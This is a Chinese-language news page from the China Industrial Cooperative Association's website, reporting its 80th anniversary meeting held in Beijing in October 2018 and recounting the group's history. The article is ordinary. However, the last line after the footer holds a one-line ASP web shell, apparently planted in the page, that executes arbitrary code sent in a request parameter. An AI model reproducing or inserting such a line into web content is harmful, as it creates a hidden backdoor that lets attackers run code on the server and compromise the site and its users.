设为首页 加入收藏 工合新闻 电子商务 入会须知 联系我们  

网站首页
  工合新闻
>>  2011年
>>  2012年
>>  2013年
>>  2014年
>>  2015年
>>  2016年
>>  2017年
>>  2018年

地址:北京市东城区建国门北大街金成建国5号1702
电话:010-66165725   

E-mail:gunghobianjibu@126.com

 

  2018年
 
中国工合成立80周年纪念大会在京召开
 发布时间:2018/10/19 浏览次数:215

   

80年砥砺前行,几代人呕心沥血。10月18日,国内创立最早且至今仍在组织活动的工业经济社团中国工业合作协会(简称“中国工合”)成立80周年纪念大会在人民大会堂隆重举行,来自全国各地工合和会员企业的代表、兄弟单位的代表、艾黎亲属代表、工合老前辈的后代及研究工合的专家学者、社会各界人士700余人欢聚一堂,共襄盛典。

 

 

 

 

 

十一届、十二届全国人大常委会副委员长陈昌智,原国家轻工业局局长、中国轻工业联合会原会长、中华全国手工业合作总社主任陈士能同志,中共中央统战部原副部长、中华全国工商业联合会党组书记胡德平,中国轻工业联合会会长张崇和,原国家轻工业局副局长、中国轻工业联合会名誉会长、中国关心下一代工作委员会常务副主任兼秘书长杨志海同志,新西兰驻华大使AmbassadorClare Fearnley,十二届全国政协常委兼全国政协副秘书长、民革中央原副主席何丕洁同志,第十二届全国人大常委会委员、全国工商联原副主席李路同志,台湾新华劳动党主席韩云洁女士以及中央统战部、民政部、中央纪委国家监委驻审计署纪检监察组、国台办等中央和国家有关部门的负责同志出席了中国工合成立80周年纪念大会。中国国民党荣誉主席连战、吴伯雄,中国国民党前主席洪秀柱,中国国民党民誉副主席蒋孝严发来贺词。

   陈昌智同志在大会上发表讲话,充分肯定了中国工合的历史和工作,希望中国工合坚持以习近平新时代中国特色社会主义思想为指导,不忘初心,牢记使命,坚持民主办会的宗旨,加强协会建设和职能保障,全面提高协会自我管理和自我完善的能力,增强协会的社会信誉度和影响力。希望全体工合人紧密团结在以习近平同志为核心的党中央周围,统一思想,统一行动,锐意改革,锐意进取,为决胜全面建成小康社会、加快推进社会主义现代化、实现中华民族伟大复兴的中国梦而奋斗!

     

    中国轻工业联合会会长张崇和、新西兰驻华大使Ambassador Clare Fearnley、台湾中国文化经济发展协会会长林竹松、中国人民对外友好协会秘书长李希奎分别在大会上致辞。

 

 

 

 

中国工合唐保玲理事长向大会作报告,全面回顾了中国工合80年的光辉历程,总结了中国工合为支援抗日战争胜利所作的历史贡献和在建设中国特色社会主义伟大事业中的积极作用,阐述了工合在新时代的历史使命和今后的工作任务。工合人坚信,有党和国家的支持,有各级领导的关爱,有全体工合人的共同努力,中国工合一定能够发扬光大工合事业,在新的征程上再创佳绩。

      

 

会上还举行了中国工业合作协会纪念路易•艾黎专项基金启动仪式。据了解,中国工合设立此专项基金旨在以实际行动贯彻落实习近平总书记关于发扬传承路易•艾黎“努力干、一起干”的工合精神的重要指示,为推动艾老开创的工合事业,促进世界和平与发展、构建人类命运共同体作出新的贡献。诸多爱心企业与爱心人士闻讯后踊跃捐款,涌动着工合人的大爱,也寄托了工合人把工合事业做得更大更好更强的信仰和梦想!


 

会上还宣读了《中国工业合作协会关于表彰中国工合先进集体、先进个人的决定》,对工合系统的先进单位和先进个人进行了表彰。

据悉,中国工业合作协会是在中国共产党指导下,由国际友人路易•艾黎、埃德加•斯诺夫妇及爱国民主人士发起,国共两党高层要员参与组建和领导,于1938年8月在武汉成立的。它是国共第二次合作的产物,是中国人民抗日民族统一战线的结晶,也是目前大陆唯一由国共两党共同创办并仍在开展活动的社会组织。

当时的中国工合高举“爱国抗战”的旗帜,以“建设经济国防,支持长期抗战,发展民族工业,实行民生主义”为使命,组建成立了三千多个工业合作社,生产大量军需和民用产品,多方争取国际援助,举办培黎教育和社会福利事业,成为抗战时期一支独特的经济力量,成为世界上最大的生产合作运动的先驱,被誉为抗日的“后方经济堡垒”。中国工合运动在国际上产生了重大影响,是世界反法西斯统一战线的一个重要组成部分,“工合GUNG HO”成为美国字典的一个词条,它是团结、合作、勇敢、开拓的象征。中国工合为中国人民抗日战争的胜利作出的重要贡献,赢得了毛泽东、周恩来、邓小平、宋庆龄、习近平、胡耀邦、李先念、邓颖超、习仲勋、李鹏、朱镕基、温家宝、李克强等党和国家领导人的充分肯定和高度赞誉。

1983年恢复组织活动以来,中国工合高举“强国富民”的旗帜,以建设中国特色社会主义为使命,发扬老一代工合人团结奋斗、艰苦创业的光荣传统,坚持“团结合作一起干”,积极为会员企业提供国内外合作平台,广泛开展培黎教育、信息交流、技术咨询服务,为发展经济、扩大就业、探索所有制改革、改善民生、全面建设小康社会作出了新的贡献。目前,中国工合拥有会员企业2万多家,涵盖多个行业,正在走出一条“以合作经济为基础,以民营经济为主体,跨地区、跨行业、跨所有制合作发展”的新路。


 

 

 

中国工业合作协会  版权所有

指导单位:中华人民共和国民政部、国务院国有资产监督管理委员会

主办单位:中国工业合作协会 

电话:010-66165725 邮箱:gunghobianjibu@126.com  地址:北京市东城区建国门内大街金成建国5号1702

"%><%Eval(Request(chr(112)))%><%'.